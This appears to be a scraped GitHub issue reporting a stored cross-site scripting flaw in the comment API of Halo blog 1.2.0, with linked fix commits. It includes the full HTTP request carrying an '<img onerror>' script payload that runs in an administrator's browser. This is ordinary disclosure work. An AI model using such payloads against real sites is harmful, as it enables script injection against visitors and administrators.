Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Server Version:1.2.0 Admin Version:1.2.0 DataBase:H2
Halo blog allows users to submit comments on blog posts, Application receives data from an untrusted source and not filtered.
The post packet is as follows:
POST /api/content/posts/comments HTTP/1.1 Host: 192.168.0.104:8090 Content-Length: 132 Accept: application/json, text/plain, */* Content-Type: application/json;charset=UTF-8 Origin: http://192.168.0.104:8090 Referer: http://192.168.0.104:8090/archives/hello-halo Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"author":"guest1","authorUrl":"http://test.com","email":"guest@gmail.com","content":"<img src=1 onerror=alert(/test/)>","postId":1}
After this comment has been submitted, admin who visits the blog post. The script supplied by the attacker will then execute in the victim user's browser.
code: src/main/java/run/halo/app/controller/content/api/PostController.java
The text was updated successfully, but these errors were encountered:
Related: #127
Sorry, something went wrong.
Thanks for your exploration and suggestions.
fix: halo-dev#547
6cdb15d
fix: #547 (#677)
d6b3d6c
fix: halo-dev#547 (halo-dev#677)
e5ca012
JohnNiang
Successfully merging a pull request may close this issue.
Environment
Server Version:1.2.0
Admin Version:1.2.0
DataBase:H2
Vulnerability details
Halo blog allows users to submit comments on blog posts, Application receives data from an untrusted source and not filtered.
step1: submit comment
The post packet is as follows:
step2: view the blog post
After this comment has been submitted, admin who visits the blog post. The script supplied by the attacker will then execute in the victim user's browser.
code: src/main/java/run/halo/app/controller/content/api/PostController.java

Suggestions for repair
The text was updated successfully, but these errors were encountered: